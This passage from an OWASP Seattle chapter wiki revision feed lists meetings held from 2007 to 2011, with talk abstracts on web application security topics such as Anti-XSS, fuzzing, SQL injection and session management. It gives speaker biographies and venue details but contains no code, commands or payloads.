* An expanded white list that supports more languages&lt;br /&gt;
* Performance improvements&lt;br /&gt;
* Performance data sheets (in the online help)&lt;br /&gt;
* Support for Shift_JIS encoding for mobile browsers&lt;br /&gt;
* Security Runtime Engine (SRE) HTTP module&lt;br /&gt;
* A sample application&lt;br /&gt;
 &lt;br /&gt;
In this session, we will learn in-depth how Anti-XSS works and learn more about its new features.&lt;br /&gt;
&lt;br /&gt;
'''Anil Kumar Revuru''' currently works on the Information Security Tools team at Microsoft as a Senior SDE, where he is responsible for architecting security tools. In his previous life at Microsoft, Anil conducted security design reviews, threat modeling, and application and source-code assessments. He has authored security tools and has presented security courses internally at Microsoft. He excelled in his abilities by developing security tools such as the Microsoft Threat Analysis and Modeling Tool and the Anti-XSS Library. Anil holds a Diploma in Mechanical Engineering from JNTU Hyderabad. Anil displayed expert proficiency in the substantive and technical areas of design and development. He has a keen interest in photography, Xbox and computer hardware.&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Andre Gironda'''&lt;br /&gt;
&lt;br /&gt;
'''Using ASVS with the Code Review Guide, Testing Guide, and Time Management'''&lt;br /&gt;
&lt;br /&gt;
The OWASP Application Security Verification Standard (ASVS), which defines&lt;br /&gt;
four levels of web application security verification, lays down a&lt;br /&gt;
framework for security architecture review. While the ASVS includes&lt;br /&gt;
many requirements for controls, it does not suggest which tools,&lt;br /&gt;
techniques, timeline or methodologies to utilize. The OWASP Code&lt;br /&gt;
Review and Testing Guides provide the technical practices and suggest&lt;br /&gt;
or hint at tools, but also lack the timeline and methodology necessary&lt;br /&gt;
to complete an application penetration-test or SDLC integration&lt;br /&gt;
project for proper application security hygiene.&lt;br /&gt;
&lt;br /&gt;
This presentation will provide the 1,000-foot view all the way down to&lt;br /&gt;
the nitty-gritty details of how to perform ASVS activities using OWASP&lt;br /&gt;
resources, as well as some OWASP and non-OWASP tools (freeware or&lt;br /&gt;
demoware). Example timelines for typical ASVS activities, including&lt;br /&gt;
reports, will be discussed so that any sort of application security&lt;br /&gt;
project can be scoped properly, delivered on time, and within budget.&lt;br /&gt;
&lt;br /&gt;
'''Andre Gironda''' is an application security specialist with a global&lt;br /&gt;
security consulting firm providing IT security services to the Fortune&lt;br /&gt;
500 and financial institutions as well as U.S. and foreign&lt;br /&gt;
governments. Prior to his current employment, Andre held a number of&lt;br /&gt;
payment application security positions in addition to working for the&lt;br /&gt;
largest online auction website. He is currently a leader for the Open&lt;br /&gt;
Web Application Security Project (OWASP), where he co-produces the&lt;br /&gt;
global OWASP News Podcast.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 28 April (Tuesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 4/28/2009&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Scott Stender'''&lt;br /&gt;
&lt;br /&gt;
'''Securing our Legacy - Responding to the call to provide practical security assurance'''&lt;br /&gt;
&lt;br /&gt;
Every few months sees the release of a much-hailed report from an industry organization, think tank, or government agency calling for the software that runs our critical infrastructure to be secured. Making the call is easy, acting on it is only slightly harder, but succeeding at it is incredibly difficult.&lt;br /&gt;
 &lt;br /&gt;
Of all of the tasks that must be undertaken to truly meet the call, the single biggest challenge I have seen companies face is delivering security assurance on legacy code. This talk will explore the challenge of providing security assurance for these old, little-loved, but heroic systems that power our lives. More importantly, it will include guidance for software development managers and engineers seeking to gain insight into the operation of their legacy systems, mechanisms by which important security assertions can be gathered, and practical methods for carrying out penetration tests and code reviews with the aim of providing a high degree of security assurance.&lt;br /&gt;
 &lt;br /&gt;
Scott Stender is a co-founder and Partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at @stake and Microsoft in previous lives.&lt;br /&gt;
 &lt;br /&gt;
In his research, Scott focuses on secure software engineering methodology and analysis of core technologies. Scott has been published in publications such as IEEE Security &amp;amp; Privacy, and has presented at Microsoft Blue Hat and at Black Hat conferences on several occasions. Scott holds a BS in Computer Engineering from the University of Notre Dame.&lt;br /&gt;
-----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Ashok Misra'''&lt;br /&gt;
&lt;br /&gt;
'''Application Issues with encryption of PANs'''&lt;br /&gt;
&lt;br /&gt;
There are unique application issues related to the storage and processing of credit card numbers for ecommerce transaction processing. This talk focuses on issues with the various cryptographic primitives used for PANs.&lt;br /&gt;
  &lt;br /&gt;
Ashok Misra is an e-commerce professional with more than 10 years' experience delivering results for leading e-commerce merchants.&lt;br /&gt;
 &lt;br /&gt;
He is currently Sr. Manager Payments &amp;amp; Security in the Media Applications Platform Development Division for e-Commerce products for Real Networks, Inc in Seattle, Washington. He brings an unusually comprehensive insight into security and payments processing.&lt;br /&gt;
 &lt;br /&gt;
Ashok is responsible for Billing for Real's Consumer Divisions. He takes a leadership role in identifying new opportunities in the consumer payments domain. He has extensive hands-on experience in merchant integration with several leading payment providers.&lt;br /&gt;
 &lt;br /&gt;
Prior to working with Real Networks he built backend components for ecommerce for Amazon.com.&lt;br /&gt;
 &lt;br /&gt;
He has comprehensive domain knowledge in consumer payments over the internet with Credit Cards, EU Direct Debit, Real-time Bank Transfers, Redirect Payment Instruments, Fraud Detection and PCI Compliance.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 23 October (Thursday) ===&lt;br /&gt;
&lt;br /&gt;
'''Location:''' 810 Third Avenue&lt;br /&gt;
&lt;br /&gt;
Seattle, WA 98104&lt;br /&gt;
&lt;br /&gt;
Conference room on the first floor &lt;br /&gt;
&lt;br /&gt;
'''Date:''' 10/23/2008&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6:30PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Michael Eddington'''&lt;br /&gt;
&lt;br /&gt;
'''Fuzzjacking!'''&lt;br /&gt;
&lt;br /&gt;
Fuzzing is one of the hot new buzzwords in the security industry and&lt;br /&gt;
if your clients have not already asked for it, they will. This talk will&lt;br /&gt;
introduce the subject, talk about different types of fuzzers,&lt;br /&gt;
integration into SDL, when to fuzz, and also talk a bit about the Peach&lt;br /&gt;
Fuzzing Platform. Questions and interaction requested :)&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Michael Eddington is a founding principal of Leviathan Security Group with over ten years'&lt;br /&gt;
experience in computer security, with expertise in application and&lt;br /&gt;
network security, through threat modeling. Michael founded the&lt;br /&gt;
security services practice for IOActive and co-founded the Security&lt;br /&gt;
Services Center for Hewlett-Packard's services division. Michael is&lt;br /&gt;
also an accomplished software developer, having participated in a&lt;br /&gt;
number of open-source security development projects ranging from the&lt;br /&gt;
Trike threat modeling conceptual framework to the Peach Fuzzer&lt;br /&gt;
Platform.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Chris Weber'''&lt;br /&gt;
&lt;br /&gt;
'''Exploiting Unicode-enabled Software'''&lt;br /&gt;
&lt;br /&gt;
This talk will showcase some of the ways that Unicode has been leveraged to cause software to break. We will survey the security issues outlined in Unicode Technical Reports 36 and 39. The issues highlighted will be illustrated by examples of historical Unicode-related security flaws in popular software and Web applications. For each vulnerability we will assess the damage that was inflicted, describe how the exploit worked, and discuss the root cause. Examples will include demonstrations of how clever attackers can exploit Unicode-enabled software to run arbitrary code or take over the machine.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Chris Weber co-founded Casaba Security, which focuses on security testing for some of the world's leading software development companies and online properties. He has authored several security books, articles and presentations. He has worked as a security researcher and consultant for seven years and has identified hundreds of security vulnerabilities in many widely used software products.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 12 June (Thursday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
'''Date:''' 06/12/2008&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6:30PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Taylor McKinley'''&lt;br /&gt;
&lt;br /&gt;
'''Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking'''&lt;br /&gt;
&lt;br /&gt;
Dynamic taint propagation allows testers to find vulnerabilities without modifying existing functional tests. It enables true security testing inside a QA organization because it allows tight integration with existing QA infrastructure and solid usability for non-security experts. This talk will:&lt;br /&gt;
&lt;br /&gt;
*Explain how dynamic taint propagation works.&lt;br /&gt;
*Show how to retrofit an existing executable to perform dynamic taint propagation.&lt;br /&gt;
*Demonstrate how a tester can use a typical suite of functional tests to find vulnerabilities, without the need for malicious input or security expertise.&lt;br /&gt;
*Compare this approach with the effectiveness of popular penetration testing tools, particularly those acquired by IBM and HP in 2007, when deployed in a QA environment.&lt;br /&gt;
&lt;br /&gt;
The talk will conclude with a look towards the future of security testing in the QA environment and an overview of how multiple analysis techniques, both static and dynamic, can work together to provide better software assurance.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Taylor McKinley''', Product Manager, Fortify Software&lt;br /&gt;
&lt;br /&gt;
Mr. McKinley brings a rich business and technology background to Fortify Software, including strategic advisory roles at Morgan Stanley Dean Witter, New England Capital Partners and as a Principal at The Parthenon Group. Mr. McKinley has a BA from Williams College and an MBA from Stanford Business School.&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Scott Stender'''&lt;br /&gt;
&lt;br /&gt;
'''Concurrency Attacks in Web Applications'''&lt;br /&gt;
&lt;br /&gt;
Modern web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable web site in a matter of minutes.&lt;br /&gt;
&lt;br /&gt;
Highly parallelized, object-oriented web application frameworks encourage programming practices that make managing state difficult for a typical programmer. In order to have a web application that is robust in a multi-threaded environment, the developer must carefully manage access to all resources that can be shared by threads. Global variables, session variables, database access, and back-end systems are common examples of such resources, not to mention application-specific resources.&lt;br /&gt;
&lt;br /&gt;
Concurrency flaws result when security-sensitive resources are not managed properly. As we have seen with almost every other prevalent class of security flaws, mistakes happen often when doing the right thing is difficult. To make things worse, concurrency flaws are often subtle and are identified only through difficult targeted testing.&lt;br /&gt;
&lt;br /&gt;
This presentation will provide brief technical background on this class of flaw and enumerate testing techniques that help identify when such flaws are present.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Scott Stender''' is a founding partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at companies such as @stake and Microsoft. Scott is a noted researcher who focuses on secure software engineering and security analysis of core technologies. He holds a BS in Computer Engineering from the University of Notre Dame.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 4 March (Tuesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
'''Date:''' 03/04/2008&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6:30PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Billy Rios'''&lt;br /&gt;
&lt;br /&gt;
'''Bad Sushi - Beating Phishers at Their Own Game'''&lt;br /&gt;
&lt;br /&gt;
This talk will expose tactics and tools used by phishers, show how easy it is to hack into servers that are used to perform phishing, and demonstrate how easy it is to follow a phisher's trail to find out how they share information on US citizens including SSNs, bank account numbers, credit card numbers, ATM PINs, you name it.&lt;br /&gt;
&lt;br /&gt;
Phishers usually set up their sites on servers they have compromised. In other words, the phishers have already done the hard work and it is easy to gain access to these servers. Due to the sheer volume of sites that need to be set up to perform a successful phish, phishers tend to be sloppy and leave traces everywhere.&lt;br /&gt;
&lt;br /&gt;
This talk will expose some of the tactics and tools used by phishers. Actual walk-through of how compromised hosts were accessed to gain information about the phishers will be presented.&lt;br /&gt;
&lt;br /&gt;
This talk will also show how easy it is to construct a trail from a compromised host to obtain information about individuals that is spewed on hacker message boards located outside the United States.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Billy Rios''' lives in a phish bowl and is constantly being sent emails from acquaintances all over the world. Billy has won the Internet lotto several times, is expecting large sums of abandoned money from a long lost relative in the Congo, and has received checks accidentally made out for 30,000 instead of 30 US dollars.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Jon McClintock'''&lt;br /&gt;
&lt;br /&gt;
Session management is one of the most overlooked areas of web application security, and yet it can also be the most challenging feature to get right in your web application. This talk will provide a brief overview of web session management, followed by an exposition into how several common web application frameworks implement session management, finishing with a discussion of several classes of vulnerabilities that can arise through poor session management.&lt;br /&gt;
&lt;br /&gt;
'''Jon McClintock''' is a Senior Consultant for Leviathan Security Group, where he specializes in application security from design through implementation and into deployment. Prior to Leviathan, Jon was a Senior Software Engineer on Amazon.com's Information Security team, where he worked with software teams to define security requirements, assess application security, and educate developers about security software best practices.&lt;br /&gt;
&lt;br /&gt;
'''Date: 1/23/2008'''&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Waqas Nazir''', DigitSec&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/e/e9/Emerging_Threats_in_Distributed_Applications_%28Web_2%29.ppt presentation]&lt;br /&gt;
&lt;br /&gt;
Waqas Nazir has been working as an Information Security Consultant for clients such as Microsoft where he has delivered services in various arenas of information security. These include code reviews, black box assessments, product reviews, custom tools development for complex security problems, policy and process development. He has also worked with Microsoft Research (MSR) to develop a code analysis tool used for identifying areas of vulnerabilities in code. He has also been featured in Microsoft's Information Security Newsletter.&lt;br /&gt;
&lt;br /&gt;
Presentation Title: Emerging threats in Web 2.0&lt;br /&gt;
&lt;br /&gt;
Web 2.0 applications provide many rich features today such as hosting third party RSS Feeds, hosting third party web pages, translation services, and cross domain communication. While these rich features provide great functionality to end users, they can have serious security implications if not designed properly. Moreover, implementation flaws plague many of these features. This presentation will focus on some new emerging threats to Web 2.0 applications from a design and implementation perspective, leaving out the often covered Web 2.0 vulnerabilities (Ajax, XSRF, etc.).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Chris Clark''', iSEC Partners&lt;br /&gt;
&lt;br /&gt;
Chris Clark is a Senior Security Consultant at iSEC Partners, Inc. He possesses several years of experience in secure application design, penetration testing, and security process management. Most recently Chris worked for Microsoft performing security analysis and verification on enterprise management software and was previously responsible for the security of a web-based payment platform processing over 20 million credit card transactions per day. Chris has extensive experience in developing and delivering security trainings for large organizations, software engineering utilizing Win32 and the .Net Framework, and analyzing threats to large scale distributed systems. At Microsoft, Chris was responsible for the coordination of multiple product groups following the Microsoft Secure Development Lifecycle.&lt;br /&gt;
&lt;br /&gt;
Presentation Title: Ruby on Rails Security&lt;br /&gt;
&lt;br /&gt;
Ruby on Rails has been hailed for its ability to increase developer productivity by making web development easier.  Though Ruby on Rails may help developers create sites more quickly, it is no more immune to security threats than other web development frameworks.  Chris Clark will present the means by which the OWASP Top Ten manifest themselves in a Ruby on Rails environment, provide best practices for preventing these attacks, and discuss his ongoing research in Ruby-specific security concerns.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
11/29/2007 @ 6:30PM PST - Seattle chapter meeting&lt;br /&gt;
&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
'''Date:''' 11/29/2007&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Tom Gallagher''' has been intrigued with both physical and computer security from a young age. He is currently the lead of the Microsoft Office Security Test team. This team is primarily focused on penetration testing, writing security testing tools, and educating program managers, developers, and testers about security issues. Tom recently co-authored the MSPress title &amp;quot;Hunting Security Bugs&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Presentation Title: Hunting security bugs in your code&lt;br /&gt;
&lt;br /&gt;
Description: Finding security bugs is often regarded as an activity requiring secret powers or extremely specialized knowledge.  Some security bugs are difficult to uncover and require deep knowledge.  However, with basic knowledge many areas can be tested without much effort.  This presentation will show how to perform basic security testing using simple tools and the difference in effort between finding a bug and exploiting it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''David E Stevens III''', Senior ROI Analyst, Symplified Inc.&lt;br /&gt;
&lt;br /&gt;
In 2006, Symplified recruited Stevens for his expertise and ability to clearly explain concepts like Return On Investment (ROI) and Total Cost of Ownership (TCO). Over the past 5 years Stevens has given dozens of presentations regarding ROI, and is a confident and charismatic speaker. Stevens is touring the U.S. representing Symplified and teaching how ROI can be applied to security and Identity investments to technical security user groups.&lt;br /&gt;
&lt;br /&gt;
Synopsis of &amp;quot;Understanding ROI, TCO and other key financial aspects of IT Security&amp;quot;&lt;br /&gt;
&lt;br /&gt;
In this presentation, Stevens teaches how security and IT professionals can obtain financing for important security initiatives using accounting principles such as Return On Investment (ROI) and Total Cost of Ownership (TCO). In this 30-minute presentation, the group learns what these terms mean and how they can be used to show the value of security software purchases. He concludes by sharing other tips on how the technology professional can better communicate with their business counterparts. This non-sales presentation is intended to equip attendees with useful tools that articulate the benefits of investing in IT security. Learn from Symplified's more than 30 years combined experience in Identity Management at hundreds of Fortune 500 organizations worldwide. Attendees receive a useful ROI calculator for IDM investments. This is a must attend presentation for anyone who has ever had trouble getting the funding they needed for a security software investment!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
09/06/2007 @ 6PM PST - Seattle chapter meeting&lt;br /&gt;
&lt;br /&gt;
'''Details:'''&lt;br /&gt;
Location: &lt;br /&gt;
Bellevue Las Margaritas &lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
Time: 6 o'clock&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
* '''Rob Rachwald''' - Rob is a 10-year veteran of the high tech industry.  Rob started his tech career at Intel, where he worked on automating their complex supply chain.  Rob managed US product marketing for Commerce One and managed their marketing efforts in Asia Pacific. Rob, then, managed marketing for Coverity and joined Fortify as the Director of Product Marketing focusing on security and financial services. &lt;br /&gt;
** Online Banking - Abstract: Banks, often the biggest target of cyber attacks, have set an example for responsible security strategies.  How do the world's leading financial institutions balance risk against the pressures of delivering software to customers quickly?  How are developers trained to write code securely?  How are software security tools, such as dynamic and static analysis, deployed for optimal use?&lt;br /&gt;
* '''Damon Cortesi''' - Damon has worked in network and application security risk management for nearly a decade, beginning with his work as Systems and Security Administrator at his alma mater. Following school, he entered the professional arena as an Information Security Consultant for one of the top 10 CPA firms serving financial institutions including banks, credit unions, and even the major credit reporting bureaus. Most recently at IOActive, Mr. Cortesi has been serving the specialized needs of top technology companies in addition to standard penetration testing, web application security assessments, source code reviews, and PCI assessments.&lt;br /&gt;
** Web Hacking 101 introduces the basic concepts of web application security including SQL Injection, Cross-Site Scripting (XSS), and typical application logic flaws found in an ASP-based web application. These concepts are then put to use in a live demonstration that illustrates the all-too-common ways of attacking a web application and gaining unauthorized access to sensitive information or restricted areas of a website. Demos will include manual SQL Injection techniques as well as the use of free/open-source tools used to expedite the extraction process, examples of both reflected and stored XSS that can be used to elevate the privileges of a user, and standard authorization bypass issues that developers often ignore. Finally, basic mitigation techniques will be discussed that can be put into place by developers to prevent these common hacking techniques.&lt;br /&gt;
&lt;br /&gt;
''' Update: ''' - Rob's slides can be downloaded from [http://www.owasp.org/images/f/f6/SANS_Online_Banking_Case_study.ppt here].&lt;br /&gt;
''' Update #2: ''' - Damon's slides can be found [https://www.owasp.org/images/3/32/Web_Hacking_101.pdf here].&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
2/28/2007 @ 6PM PST - Seattle chapter meeting&lt;br /&gt;
&lt;br /&gt;
'''Details:'''&lt;br /&gt;
&lt;br /&gt;
Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)&lt;br /&gt;
&lt;br /&gt;
Time: 6 o’clock. &lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
* '''Dinis Cruz (Chief OWASP Evangelist)''' - Directly from London, Dinis will be doing two presentations at this event:&lt;br /&gt;
** '''Buffer Overflows on .Net and Asp.Net''' - One of the common myths about the .Net Framework is that it is immune to Buffer Overflows. Although this might be correct in pure managed and verifiable .Net code, a large percentage of .Net and Asp.Net application code is unmanaged code. In this talk Dinis will show the areas in .Net and Asp.Net applications that are vulnerable to Buffer Overflows (including the demo of a .Net Buffer Overflow Fuzzer).&lt;br /&gt;
** '''OWASP, the Open Web Application Security Project''' - The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. All of the OWASP tools, documents, blogs, and chapters are free and open to anyone interested in improving application security. In this presentation Dinis will show the latest guides and tools from OWASP which should be part of every company's security efforts.&lt;br /&gt;
** '''0wning Vista's userland - The CAS / UAC missed opportunity, and what I think MS should had done''' - In this presentation Dinis will explore the missed opportunity by Microsoft to use technologies like .Net's CAS (Code Access Security) and Vista's UAC (User Access Control) to create secure and trustworthy userland environments that protect the user's assets. In the hope that might make a small difference, ideas and solutions for the future will also be presented.&lt;br /&gt;
&lt;br /&gt;
* '''Brad Hill (Senior Security Consultant with iSEC Partners)''',  will be speaking on:&lt;br /&gt;
** '''XML Digital Signature and Encryption: Use and Abuse''' - The WS-Security set of standards is on the threshold of ubiquitous deployment and XML applications have already taken over the world. This presentation looks at two underlying technologies, XML Digital Signature (XMLDSIG) and XML Encryption (XMLENC), their place in the Web Services stack and their applicability to non-SOAP XML applications. Beginning with a basic overview of the standards, we will uncover some surprising caveats and risks in the use of these technologies.&lt;br /&gt;
&lt;br /&gt;
=== Previous Meeting 8 January 2007===&lt;br /&gt;
1/8/2007 @ 6 o'clock - Seattle chapter meeting.  &lt;br /&gt;
&lt;br /&gt;
'''Details:''' Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)&lt;br /&gt;
Time: 6 o’clock. &lt;br /&gt;
&lt;br /&gt;
Speakers:&lt;br /&gt;
&lt;br /&gt;
Ward Spagenberg of IOActive on the topic &amp;quot;Unraveling PCI&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Since there will be free food, beer and pop, please let Mike de Libero know so we know how much to order.&lt;br /&gt;
We look forward to seeing you all there!&lt;br /&gt;
&lt;br /&gt;
[[Category:Washington]]&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Seattle&amp;diff=119195</id>
		<title>Seattle</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Seattle&amp;diff=119195"/>
				<updated>2011-10-17T03:39:17Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Seattle|extra=The chapter leader is [mailto:mark@curphey.com Mark Curphey] ([http://www.twitter.com/curphey @curphey]). We meet monthly, usually in downtown Seattle, and manage our events using MeetUp. You must RSVP to attend meetings using [http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/ Meetup]. The chapter has a Twitter account [http://www.twitter.com/owaspseattle @owaspseattle] for local and event news.&lt;br /&gt;
&lt;br /&gt;
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-seattle|emailarchives=http://lists.owasp.org/pipermail/owasp-seattle}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Next Meeting - November 17th, 2011 ==&lt;br /&gt;
&lt;br /&gt;
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]&lt;br /&gt;
&lt;br /&gt;
Talk : [http://blogs.adobe.com/asset/2011/04/nosql-but-even-less-security.html No SQL and even less security].&lt;br /&gt;
Speaker : Bryan Sullivan&lt;br /&gt;
&lt;br /&gt;
Location : &lt;br /&gt;
KPMG, Suite 900&lt;br /&gt;
801 second avenue&lt;br /&gt;
Seattle, WA&lt;br /&gt;
&lt;br /&gt;
Time : 6pm to 8pm&lt;br /&gt;
&lt;br /&gt;
To attend this meeting you must RSVP via the Meetup page due to limited spaces. &lt;br /&gt;
&lt;br /&gt;
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]&lt;br /&gt;
&lt;br /&gt;
== December Meeting is Being Scheduled Now ==&lt;br /&gt;
&lt;br /&gt;
==Past Events==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 11 August (Wednesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 8/11/2010 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
''Presentations:''&lt;br /&gt;
&lt;br /&gt;
'''How OWASP Works and Guided Tour of OWASP Projects'''&lt;br /&gt;
 &lt;br /&gt;
'''Speaker: Dinis Cruz'''&lt;br /&gt;
&lt;br /&gt;
This presentation will focus on my experience in getting things done at OWASP, what resources are available and what types of initiatives the local chapters should be doing. In addition to a quick overview of a number of key OWASP projects, this talk will also provide a tutorial on how the OWASP WIKI (MediaWiki based) can be used as a database (using the MediaWiki templates technology).&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Using the O2 Platform to Consume OWASP projects'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Dinis Cruz'''&lt;br /&gt;
&lt;br /&gt;
This presentation will focus on how to consume the OWASP Wiki and a number of OWASP projects using the OWASP O2 Platform. The O2 Platform has powerful technology and capabilities for both BlackBox and WhiteBox analysis, and this presentation will provide examples on how to use O2 with: WebGoat, WebScarab, Code Crawler, Dir Buster, Testing Guide, Code Review Guide and OpenSAMM.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The O2 Platform is focused on automating application security knowledge and workflows. It is specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews (BlackBox + WhiteBox). In addition to the manual findings created/discovered by security consultants, the OWASP O2 Platform allows the easy consumption of results from multiple OWASP projects and commercial scanning tools. This allows security consultants to find, exploit and automate (via Unit Tests) security vulnerabilities usually dismissed by the community as impossible to find/recreate. More importantly, it provides the Security Consultants a mechanism to: a) 'talk' with developers (via UnitTest), b) give developers a way to replicate + &amp;quot;check if it's fixed&amp;quot; the vulnerabilities reported and c) engage in a two-way conversation on the best way to fix/remediate those vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
'''Dinis Cruz''' is a Security Consultant based in London (UK) and specialized in: ASP.NET/J2EE Application Security, Application Security audits and .NET Security Curriculum Development.&lt;br /&gt;
&lt;br /&gt;
For the past years Dinis has focused on the field of Static Source Code analysis. From May 2007 to Dec 2009 he worked as an independent consultant for Ounce Labs (bought by IBM in July 2009), where during active security engagements using Ounce's technology he developed the Open Source codebase which is now the foundation of the OWASP O2 Platform.&lt;br /&gt;
&lt;br /&gt;
Dinis is currently focused on making the O2 Platform the industry standard for consuming, instrumenting and data-sharing between the multiple WebAppSec tools, the Security consultants and the final developers.&lt;br /&gt;
&lt;br /&gt;
Dinis is also an active trainer on .Net security, having written and delivered courses for IOActive, Foundstone, Intense School and KPMG (at multiple locations including BlackHat), and has delivered a number of presentations and keynote speeches at multiple OWASP and Security related conferences.&lt;br /&gt;
&lt;br /&gt;
At OWASP, Dinis is the leader of the OWASP O2 Platform project, member of the OWASP Global Projects Committee, chair of the OWASP Connections Committee and member of the OWASP Board.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 28 April (Wednesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 4/28/2010 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
''Presentations:''&lt;br /&gt;
&lt;br /&gt;
'''When Tools Are Not Enough – Best Practices for Securing Web Applications'''&lt;br /&gt;
&lt;br /&gt;
'''Speakers:''' Walter Pearce &amp;amp; Wade Winright from IOActive&lt;br /&gt;
&lt;br /&gt;
